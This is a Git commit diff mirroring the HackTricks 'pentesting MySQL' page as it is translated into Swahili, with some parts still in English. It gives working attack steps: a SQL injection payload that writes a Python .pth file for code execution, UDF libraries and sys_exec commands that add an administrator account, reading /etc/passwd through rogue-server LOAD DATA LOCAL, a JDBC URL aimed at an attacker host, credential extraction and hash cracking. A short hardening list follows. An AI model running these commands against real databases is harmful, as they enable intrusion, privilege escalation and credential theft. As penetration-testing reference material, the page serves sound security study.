maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-mysql.md'] to sw

Browse Source
This commit is contained in:
Translator 2025-08-14 04:45:41 +00:00
parent 5267658687
commit dd896bc093
1 changed files with 72 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

93
src/network-services-pentesting/pentesting-mysql.md
View File

@ -2,11 +2,11 @@
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}
## **Basic Information** ## **Taarifa za Msingi**
**MySQL** inaweza kueleweka kama mfumo wa usimamizi wa hifadhidata wa uhusiano wa chanzo wazi (RDBMS) ambao upatikana bure. Inafanya kazi kwenye **Lugha ya Maswali Iliyoandikwa (SQL)**, ikiruhusu usimamizi na uendeshaji wa hifadhidata. **MySQL** inaweza kueleweka kama mfumo wa usimamizi wa hifadhidata wa uhusiano wa chanzo wazi **(RDBMS)** ambao upatikana bure. Inafanya kazi kwenye **Lugha ya Maswali Iliyoandikwa (SQL)**, ikiruhusu usimamizi na uendeshaji wa hifadhidata.
**Bandari ya kawaida:** 3306 **Bandari ya Kawaida:** 3306
``` ```
3306/tcp open mysql 3306/tcp open mysql
``` ```
@ -24,7 +24,7 @@ mysql -h <Hostname> -u root@localhost
``` ```
## External Enumeration ## External Enumeration
Baadhi ya hatua za kuhesabu zinahitaji akreditif halali Baadhi ya hatua za kuhesabu zinahitaji akreditif sahihi
```bash ```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP> nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version msf> use auxiliary/scanner/mysql/mysql_version
@ -115,7 +115,7 @@ Kwa kutumia primitive ya jadi `INTO OUTFILE`, inawezekana kupata *utendaji wa ms
1. Tumia `INTO OUTFILE` kuacha faili maalum **`.pth`** ndani ya saraka yoyote inayopakuliwa kiotomatiki na `site.py` (mfano `.../lib/python3.10/site-packages/`). 1. Tumia `INTO OUTFILE` kuacha faili maalum **`.pth`** ndani ya saraka yoyote inayopakuliwa kiotomatiki na `site.py` (mfano `.../lib/python3.10/site-packages/`).
2. Faili ya `.pth` inaweza kuwa na *mstari mmoja* unaoanza na `import ` ikifuatiwa na msimbo wa Python wa kiholela ambao utaanzishwa kila wakati mfasiri anapoanza. 2. Faili ya `.pth` inaweza kuwa na *mstari mmoja* unaoanza na `import ` ikifuatiwa na msimbo wa Python wa kiholela ambao utaanzishwa kila wakati mfasiri anapoanza.
3. Wakati mfasiri anatekelezwa kwa njia isiyo ya moja kwa moja na script ya CGI (kwa mfano `/cgi-bin/ml-draw.py` yenye shebang `#!/bin/python`), mzigo unatekelezwa kwa ruhusa sawa na mchakato wa seva ya wavuti (FortiWeb ilikimbia kama **root** → RCE kamili kabla ya uthibitishaji). 3. Wakati mfasiri anatekelezwa kwa njia isiyo ya moja kwa moja na script ya CGI (kwa mfano `/cgi-bin/ml-draw.py` yenye shebang `#!/bin/python`), mzigo unatekelezwa kwa ruhusa sawa na mchakato wa seva ya wavuti (FortiWeb ilikimbia kama **root** → RCE kamili kabla ya uthibitisho).
Mfano wa mzigo wa `.pth` (mstari mmoja, hakuna nafasi zinazoweza kujumuishwa katika mzigo wa mwisho wa SQL, hivyo hex/`UNHEX()` au kuunganisha nyuzi kunaweza kuhitajika): Mfano wa mzigo wa `.pth` (mstari mmoja, hakuna nafasi zinazoweza kujumuishwa katika mzigo wa mwisho wa SQL, hivyo hex/`UNHEX()` au kuunganisha nyuzi kunaweza kuhitajika):
```python ```python
@ -125,12 +125,12 @@ Mfano wa kuunda faili kupitia **UNION** query (herufi za nafasi zimebadilishwa n
```sql ```sql
'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth' '/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'
``` ```
Mipaka muhimu na njia za kupita: Important limitations & bypasses:
* `INTO OUTFILE` **haiwezi kufuta** faili zilizopo; chagua jina jipya la faili. * `INTO OUTFILE` **haiwezi kufuta** faili zilizopo; chagua jina jipya la faili.
* Njia ya faili inatatuliwa **kuhusiana na CWD ya MySQL**, hivyo kuongeza `../../` husaidia kupunguza njia na kupita vizuizi vya njia kamili. * Njia ya faili inatatuliwa **kuhusiana na CWD ya MySQL**, hivyo kuongeza `../../` husaidia kupunguza njia na kupita vizuizi vya njia kamili.
* Ikiwa ingizo la mshambuliaji linachukuliwa kwa `%128s` (au sawa) nafasi yoyote itakata payload; tumia mfuatano wa maoni ya MySQL `/**/` au `/*!*/` kubadilisha nafasi. * Ikiwa ingizo la mshambuliaji linachukuliwa kwa `%128s` (au sawa) nafasi yoyote itakata payload; tumia mfuatano wa maoni ya MySQL `/**/` au `/*!*/` kubadilisha nafasi.
* Mtumiaji wa MySQL anayekimbia ombi anahitaji kibali cha `FILE`, lakini katika vifaa vingi (mfano, FortiWeb) huduma inakimbia kama **root**, ikitoa ufikiaji wa kuandika karibu kila mahali. * Mtumiaji wa MySQL anayekimbia ombi anahitaji ruhusa ya `FILE`, lakini katika vifaa vingi (mfano, FortiWeb) huduma inakimbia kama **root**, ikitoa ufikiaji wa kuandika karibu kila mahali.
Baada ya kuacha `.pth`, omba tu CGI yoyote inayoshughulikiwa na tafsiri ya python ili kupata utekelezaji wa msimbo: Baada ya kuacha `.pth`, omba tu CGI yoyote inayoshughulikiwa na tafsiri ya python ili kupata utekelezaji wa msimbo:
``` ```
@ -146,9 +146,9 @@ uid=0(root) gid=0(root) groups=0(root)
``` ```
--- ---
## MySQL kusoma faili bila mpangilio na mteja ## MySQL kusoma faili kwa hiari na mteja
Kwa kweli, unapojaribu **kuchukua data za ndani kwenye jedwali** yaliyomo kwenye **faili**, seva ya MySQL au MariaDB inamwomba **mteja kuisoma** na kutuma yaliyomo. **Kisha, ikiwa unaweza kubadilisha mteja wa mysql kuungana na seva yako ya MySQL, unaweza kusoma faili bila mpangilio.**\ Kwa kweli, unapojaribu **kuchukua data za ndani kwenye jedwali** yaliyomo kwenye **faili**, seva ya MySQL au MariaDB inamwomba **mteja aisome** na kutuma yaliyomo. **Basi, ikiwa unaweza kubadilisha mteja wa mysql kuungana na seva yako ya MySQL, unaweza kusoma faili za hiari.**\
Tafadhali zingatia kwamba hii ni tabia inayotumika: Tafadhali zingatia kwamba hii ni tabia inayotumika:
```bash ```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n'; load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
@ -186,7 +186,7 @@ Katika usanidi wa huduma za MySQL, mipangilio mbalimbali inatumika kufafanua uen
- **`admin_address`** inaelezea anwani ya IP inayosikiliza kwa muunganisho wa TCP/IP kwenye kiolesura cha mtandao wa usimamizi. - **`admin_address`** inaelezea anwani ya IP inayosikiliza kwa muunganisho wa TCP/IP kwenye kiolesura cha mtandao wa usimamizi.
- Kigezo cha **`debug`** kinaashiria usanidi wa sasa wa urekebishaji, ikiwa ni pamoja na taarifa nyeti ndani ya kumbukumbu. - Kigezo cha **`debug`** kinaashiria usanidi wa sasa wa urekebishaji, ikiwa ni pamoja na taarifa nyeti ndani ya kumbukumbu.
- **`sql_warnings`** inasimamia ikiwa nyuzi za taarifa zinaundwa kwa taarifa za INSERT za safu moja wakati onyo linatokea, zikiwa na data nyeti ndani ya kumbukumbu. - **`sql_warnings`** inasimamia ikiwa nyuzi za taarifa zinaundwa kwa taarifa za INSERT za safu moja wakati onyo linatokea, zikiwa na data nyeti ndani ya kumbukumbu.
- Pamoja na **`secure_file_priv`**, upeo wa shughuli za kuagiza na kuuza data unakabiliwa ili kuboresha usalama. - Pamoja na **`secure_file_priv`**, upeo wa shughuli za kuagiza na kuuza data unakabiliwa ili kuimarisha usalama.
### Privilege escalation ### Privilege escalation
```bash ```bash
@ -208,16 +208,16 @@ grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mys
``` ```
### Privilege Escalation via library ### Privilege Escalation via library
Ikiwa **mysql server inafanya kazi kama root** (au mtumiaji mwingine mwenye mamlaka zaidi) unaweza kuifanya itekeleze amri. Kwa hiyo, unahitaji kutumia **user defined functions**. Na ili kuunda user defined unahitaji **library** kwa ajili ya OS inayofanya kazi mysql. If the **mysql server is running as root** (or a different more privileged user) you can make it execute commands. For that, you need to use **user defined functions**. And to create a user defined you will need a **library** for the OS that is running mysql.
Library mbaya ya kutumia inaweza kupatikana ndani ya sqlmap na ndani ya metasploit kwa kufanya **`locate "*lib_mysqludf_sys*"`**. Faili za **`.so`** ni **linux** libraries na **`.dll`** ni za **Windows**, chagua ile unayohitaji. The malicious library to use can be found inside sqlmap and inside metasploit by doing **`locate "*lib_mysqludf_sys*"`**. The **`.so`** files are **linux** libraries and the **`.dll`** are the **Windows** ones, choose the one you need.
Ikiwa **huna** hizo libraries, unaweza ama **kutafuta** au kupakua hii [**linux C code**](https://www.exploit-db.com/exploits/1518) na **kuikamilisha ndani ya mashine ya linux yenye udhaifu**: If you **don't have** those libraries, you can either **look for them**, or download this [**linux C code**](https://www.exploit-db.com/exploits/1518) and **compile it inside the linux vulnerable machine**:
```bash ```bash
gcc -g -c raptor_udf2.c gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
``` ```
Sasa kwamba una maktaba, ingia ndani ya Mysql kama mtumiaji mwenye mamlaka (root?) na fuata hatua zifuatazo: Sasa kwamba una maktaba, ingia ndani ya Mysql kama mtumiaji mwenye mamlaka (root?) na ufuate hatua zifuatazo:
#### Linux #### Linux
```sql ```sql
@ -251,7 +251,7 @@ CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add"); SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add"); SELECT sys_exec("net localgroup Administrators npn /add");
``` ```
### Kutolewa kwa hati za MySQL kutoka kwa faili ### Kutolewa kwa akidi za MySQL kutoka kwa faili
Ndani ya _/etc/mysql/debian.cnf_ unaweza kupata **nenosiri la maandiko** la mtumiaji **debian-sys-maint** Ndani ya _/etc/mysql/debian.cnf_ unaweza kupata **nenosiri la maandiko** la mtumiaji **debian-sys-maint**
```bash ```bash
@ -265,13 +265,13 @@ Unaweza kuzitoa kwa kufanya:
```bash ```bash
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password" grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
``` ```
### Kuwezesha uandishi wa kumbukumbu ### Kuanzisha uandishi wa kumbukumbu
Unaweza kuwezesha uandishi wa kumbukumbu za mysql queries ndani ya `/etc/mysql/my.cnf` kwa kufungua mistari ifuatayo: Unaweza kuanzisha uandishi wa kumbukumbu wa maswali ya mysql ndani ya `/etc/mysql/my.cnf` kwa kuondoa alama za maoni kwenye mistari ifuatayo:
![](<../images/image (899).png>) ![](<../images/image (899).png>)
### Faili za Manufaa ### Faili muhimu
Faili za Usanidi Faili za Usanidi
@ -615,7 +615,7 @@ x$waits_global_by_latency
{{#endtab}} {{#endtab}}
{{#endtabs}} {{#endtabs}}
## HackTricks Amri za Otomatiki ## Amri za Kiotomatiki za HackTricks
``` ```
Protocol_Name: MySql #Protocol Abbreviation if there is one. Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one. Port_Number: 3306 #Comma separated if there is more than one.
@ -646,7 +646,58 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit' Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
``` ```
## Marejeo ## 2023-2025 Highlights (new)
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
### JDBC `propertiesTransform` deserialization (CVE-2023-21971)
Kuanzia Connector/J <= 8.0.32 mshambuliaji ambaye anaweza kuathiri **JDBC URL** (kwa mfano katika programu za wahusika wengine zinazohitaji mfuatano wa muunganisho) anaweza kuomba madarasa yasiyo na mipaka kupakiwa upande wa *mteja* kupitia parameter ya `propertiesTransform`. Ikiwa gadget iliyopo kwenye njia ya darasa inaweza kupakiwa, hii inasababisha **utendaji wa msimbo wa mbali katika muktadha wa mteja wa JDBC** (kabla ya uthibitisho, kwa sababu hakuna akidi halali zinazohitajika). PoC ndogo inaonekana kama:
```java
jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil
```
Kukimbia `Evil.class` kunaweza kuwa rahisi kama kuifanya iwe kwenye class-path ya programu iliyo hatarini au kuacha seva ya MySQL isiyo na adabu itume kitu kibaya kilichosawazishwa. Tatizo lilitatuliwa katika Connector/J 8.0.33 sasisha dereva au weka wazi `propertiesTransform` kwenye orodha ya ruhusa.
(Tazama andiko la Snyk kwa maelezo)
### Mashambulizi ya seva ya MySQL isiyo na adabu / bandia dhidi ya wateja wa JDBC
Zana kadhaa za chanzo wazi zinafanya kazi ya *sehemu* ya itifaki ya MySQL ili kushambulia wateja wa JDBC wanaounganisha nje:
* **mysql-fake-server** (Java, inasaidia kusoma faili na unyonyaji wa deserialization)
* **rogue_mysql_server** (Python, uwezo sawa)
Njia za kawaida za shambulio:
1. Programu ya mwathirika inapoleta `mysql-connector-j` na `allowLoadLocalInfile=true` au `autoDeserialize=true`.
2. Mshambuliaji anadhibiti DNS / kuingia kwa mwenyeji ili jina la mwenyeji wa DB liweze kutatua kwenye mashine chini ya udhibiti wao.
3. Seva mbaya inajibu na pakiti zilizoundwa ambazo zinaanzisha ama `LOCAL INFILE` kusoma faili isiyo na mipaka au deserialization ya Java → RCE.
Mfano wa mstari mmoja kuanzisha seva bandia (Java):
```bash
java -jar fake-mysql-cli.jar -p 3306 # from 4ra1n/mysql-fake-server
```
Kisha elekeza programu ya mwathirika kwa `jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true` na usome `/etc/passwd` kwa kuandika jina la faili kama base64 katika uwanja wa *username* (`fileread_/etc/passwd``base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=`).
### Kufungua `caching_sha2_password` hashes
MySQL ≥ 8.0 inahifadhi hash za nywila kama **`$mysql-sha2$`** (SHA-256). Hashcat (mode **21100**) na John-the-Ripper (`--format=mysql-sha2`) zinasaidia kufungua kwa mbali tangu 2023. Dump the `authentication_string` column and feed it directly:
```bash
# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist
```
### Orodha ya kuimarisha (2025)
• Weka **`LOCAL_INFILE=0`** na **`--secure-file-priv=/var/empty`** kuua sehemu nyingi za kusoma/kandika faili.
• Ondoa ruhusa ya **`FILE`** kutoka kwa akaunti za programu.
• Kwenye Connector/J weka `allowLoadLocalInfile=false`, `allowUrlInLocalInfile=false`, `autoDeserialize=false`, `propertiesTransform=` (bila kitu).
• Zima nyongeza zisizotumika za uthibitishaji na **hitaji TLS** (`require_secure_transport = ON`).
• Fuata kwa `CREATE FUNCTION`, `INSTALL COMPONENT`, `INTO OUTFILE`, `LOAD DATA LOCAL` na matamko ya ghafla ya `SET GLOBAL`.
---
## Marejeleo
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
- [Oracle MySQL Connector/J propertiesTransform RCE CVE-2023-21971 (Snyk)](https://security.snyk.io/vuln/SNYK-JAVA-COMMYSQL-5441540)
- [mysql-fake-server Rogue MySQL server for JDBC client attacks](https://github.com/4ra1n/mysql-fake-server)
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}